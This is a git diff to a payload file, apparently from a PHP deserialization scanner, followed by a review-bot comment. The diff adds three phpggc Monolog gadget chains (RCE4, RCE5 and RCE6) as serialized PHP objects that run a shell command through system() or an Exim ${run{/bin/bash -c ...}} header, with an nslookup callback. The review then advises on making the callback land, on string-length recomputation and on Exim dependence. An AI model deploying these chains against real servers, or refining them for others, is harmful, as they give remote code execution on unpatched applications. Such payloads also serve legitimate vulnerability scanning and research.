diff --git a/res/payloads.json b/res/payloads.json
index 4e85eee..daafc51 100644
--- a/res/payloads.json
+++ b/res/payloads.json
@@ -85,9 +85,21 @@ }, { "_needs_dynamic_payload_editing": false, - "name": "Monolog 1.5 <= 1.17", - "gen_with": "./phpggc Monolog/RCE2 ", - "payload": "O:32:\"Monolog\\Handler\\SyslogUdpHandler\":1:{s:6:\"socket\"%3BO:29:\"Monolog\\Handler\\BufferHandler\":7:{s:10:\"%00*%00handler\"%3BO:29:\"Monolog\\Handler\\BufferHandler\":7:{s:10:\"%00*%00handler\"%3BN%3Bs:13:\"%00*%00bufferSize\"%3Bi:-1%3Bs:9:\"%00*%00buffer\"%3Ba:1:{i:0%3Ba:2:{i:0%3Bs:72:\"nslookup CHANGEME\"%3Bs:5:\"level\"%3BN%3B}}s:8:\"%00*%00level\"%3BN%3Bs:14:\"%00*%00initialized\"%3Bb:1%3Bs:14:\"%00*%00bufferLimit\"%3Bi:-1%3Bs:13:\"%00*%00processors\"%3Ba:2:{i:0%3Bs:7:\"current\"%3Bi:1%3Bs:6:\"system\"%3B}}s:13:\"%00*%00bufferSize\"%3Bi:-1%3Bs:9:\"%00*%00buffer\"%3Ba:1:{i:0%3Ba:2:{i:0%3Bs:72:\"nslookup CHANGEME\"%3Bs:5:\"level\"%3BN%3B}}s:8:\"%00*%00level\"%3BN%3Bs:14:\"%00*%00initialized\"%3Bb:1%3Bs:14:\"%00*%00bufferLimit\"%3Bi:-1%3Bs:13:\"%00*%00processors\"%3Ba:2:{i:0%3Bs:7:\"current\"%3Bi:1%3Bs:6:\"system\"%3B}}}" + "name": "Monolog ? 
<= 2.4.4+", + "gen_with": "./phpggc Monolog/RCE4 ", + "payload": "O:30:\"Monolog\\Handler\\RollbarHandler\":2:{s:42:\"%00Monolog\\Handler\\RollbarHandler%00hasRecords\"%3Bb:1%3Bs:16:\"%00*%00rollbarLogger\"%3BO:29:\"Monolog\\Handler\\BufferHandler\":3:{s:13:\"%00*%00bufferSize\"%3Bi:2%3Bs:10:\"%00*%00handler\"%3BO:35:\"Monolog\\Handler\\NativeMailerHandler\":7:{s:8:\"%00*%00level\"%3Bi:1%3Bs:13:\"%00*%00processors\"%3Ba:1:{i:0%3Bs:13:\"array_reverse\"%3B}s:12:\"%00*%00formatter\"%3BO:31:\"Monolog\\Formatter\\LineFormatter\":1:{s:9:\"%00*%00format\"%3Bs:0:\"\"%3B}s:17:\"%00*%00maxColumnWidth\"%3Bi:20%3Bs:13:\"%00*%00parameters\"%3Ba:1:{i:0%3Bs:3:\"-be\"%3B}s:5:\"%00*%00to\"%3Ba:1:{i:0%3Bs:14:\"init@localhost\"%3B}s:10:\"%00*%00headers\"%3Ba:1:{i:0%3Bs:115:\"${run{/bin/bash -c \"nslookup CHANGEME?1620384651\"}{yes}{no}}\"%3B}}s:9:\"%00*%00buffer\"%3Ba:1:{i:0%3Ba:5:{s:5:\"level\"%3Bi:100%3Bs:7:\"message\"%3Bi:1%3Bs:7:\"context\"%3Ba:0:{}s:5:\"extra\"%3Ba:0:{}s:7:\"channel\"%3Bi:1%3B}}}}" + }, + { + "_needs_dynamic_payload_editing": false, + "name": "Monolog 1.25 <= 2.2.0+", + "gen_with": "./phpggc Monolog/RCE5 ", + "payload": "O:37:\"Monolog\\Handler\\FingersCrossedHandler\":3:{s:16:\"%00*%00passthruLevel\"%3Bi:0%3Bs:9:\"%00*%00buffer\"%3Ba:1:{s:4:\"test\"%3Ba:2:{i:0%3Bs:72:\"nslookup CHANGEME\"%3Bs:5:\"level\"%3BN%3B}}s:10:\"%00*%00handler\"%3BO:28:\"Monolog\\Handler\\GroupHandler\":1:{s:13:\"%00*%00processors\"%3Ba:2:{i:0%3Bs:7:\"current\"%3Bi:1%3Bs:6:\"system\"%3B}}}" + }, + { + "_needs_dynamic_payload_editing": false, + "name": "Monolog 1.10.0 <= 2.2.0+", + "gen_with": "./phpggc Monolog/RCE6 ", + "payload": "O:37:\"Monolog\\Handler\\FingersCrossedHandler\":3:{s:16:\"%00*%00passthruLevel\"%3Bi:0%3Bs:9:\"%00*%00buffer\"%3Ba:1:{s:4:\"test\"%3Ba:2:{i:0%3Bs:72:\"nslookup 
CHANGEME\"%3Bs:5:\"level\"%3BN%3B}}s:10:\"%00*%00handler\"%3BO:29:\"Monolog\\Handler\\BufferHandler\":7:{s:10:\"%00*%00handler\"%3BN%3Bs:13:\"%00*%00bufferSize\"%3Bi:-1%3Bs:9:\"%00*%00buffer\"%3BN%3Bs:8:\"%00*%00level\"%3BN%3Bs:14:\"%00*%00initialized\"%3Bb:1%3Bs:14:\"%00*%00bufferLimit\"%3Bi:-1%3Bs:13:\"%00*%00processors\"%3Ba:2:{i:0%3Bs:7:\"current\"%3Bi:1%3Bs:6:\"system\"%3B}}}" }, { "_needs_dynamic_payload_editing": false,
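Review bot: The RCE4 entry's command reads `nslookup CHANGEME?1620384651` while every other payload in the hunk uses plain `nslookup CHANGEME`; the `?1620384651` suffix looks like a leftover timestamp from when the chain was generated, and a lookup name containing `?` may be refused by the resolver, in which case the callback never lands. Dropping the suffix is not a plain text edit, though: the serialized string is declared `s:115:` (the siblings `s:72:`), which only adds up if CHANGEME is substituted with exactly 63 characters, so any change to the command needs the PHP string length recomputed or the substitution contract re-checked. If the consumer tolerates extra keys, a short `"_comment": "RCE4 fires only when mail() hands off to Exim: -be and ${run{...}{yes}{no}} are Exim expansion features"` next to the entry would save operators from reading a miss on this chain as proof the target is not vulnerable, since the `-be` parameter and the `${run...}` header are inert on other MTAs. Finally, the Monolog 1.5–1.17 (RCE2) entry is removed rather than kept alongside the three new chains; if that is intentional, the new lower bounds (1.10.0, 1.25 and `?`) no longer cover 1.5–1.9 targets, which is worth stating in the commit description.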